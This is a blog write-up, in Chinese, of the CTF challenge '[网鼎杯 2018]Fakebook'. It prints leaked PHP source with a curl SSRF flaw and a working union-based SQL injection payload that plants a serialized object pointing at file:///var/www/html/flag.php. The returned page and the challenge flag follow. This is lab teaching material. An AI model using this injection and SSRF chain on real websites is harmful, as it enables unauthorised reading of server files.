buuoj刷题记录5

[网鼎杯 2018]Fakebook

0x00 基础

一般文件的目录又xxx.php.bak/swp,或者查看元素、robots.txt里面有提示,或者www.zip等一系列文件中出现网站源码。也可以使用工具扫描

0x01 分析

访问robots.txt,给了一个提示

1
2
User-agent: *
Disallow: /user.php.bak

拿到user.php的源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<?php


class UserInfo
{
public $name = "";
public $age = 0;
public $blog = "";

public function __construct($name, $age, $blog)
{
$this->name = $name;
$this->age = (int)$age;
$this->blog = $blog;
}

function get($url)
{
$ch = curl_init(); //初始化链接

curl_setopt($ch, CURLOPT_URL, $url); //设置CURLOPT_URL
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //将curl_exec()获取的信息以文件流的形式返回,而不是直接输出
$output = curl_exec($ch); /执行CURL会话;此处存在ssrf
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if($httpCode == 404) {
return 404;
}
curl_close($ch);

return $output;
}

public function getBlogContents ()
{
return $this->get($this->blog); //获取博客地址
}

public function isValidBlog ()
{
$blog = $this->blog;
return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog); //博客地址有过滤
}

}

访问flag.php,显示返回是200。那么应该是要将./flag.php写入博客地址,让程序加载。

在加入一个用户时的username存在post注入,加入完成,进入到view.php发现也存在注入

0x02 开始操作

使用sqlmap跑了一遍post注入,发现数据库中存的是序列化后结果,应该存在序列化漏洞。

1
payload=view.php?no=0/**/union/**/select/**/1,2,3,'O:8:"UserInfo":3{s:4:"name";s:4:"and";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

执行结果

查看源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<!doctype html>
<html lang="ko">
<head>
<meta charset="UTF-8">
<meta name="viewport"
content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>User</title>

<link rel="stylesheet" href="css/bootstrap.min.css" crossorigin="anonymous">
<script src="js/jquery-3.3.1.slim.min.js" crossorigin="anonymous"></script>
<script src="js/popper.min.js" crossorigin="anonymous"></script>
<script src="js/bootstrap.min.js" crossorigin="anonymous"></script>
</head>
<body>
<div class="container">
<table class="table">
<tr>
<th>
username
</th>
<th>
age
</th>
<th>
blog
</th>
</tr>
<tr>
<td>
2 </td>
<td>
12 </td>
<td>
file:///var/www/html/flag.php </td>
</tr>
</table>

<hr>
<br><br><br><br><br>
<p>the contents of his/her blog</p>
<hr>
<iframe width='100%' height='10em' src='data:text/html;base64,PD9waHANCg0KJGZsYWcgPSAiZmxhZ3s4MzUwNjViNi1iNjBkLTQ5ZGEtYTkyYi1kZDgwZDM4MDMyZGN9IjsNCmV4aXQoMCk7DQo='>
</div>
</body>
</html>

点击即可看见flag

1
2
3
4
<?php

$flag = "flag{835065b6-b60d-49da-a92b-dd80d38032dc}";
exit(0);
  • © 2019-2023 sunny250
  • Hexo Theme Ayer by shenyu
    • PV:
    • UV: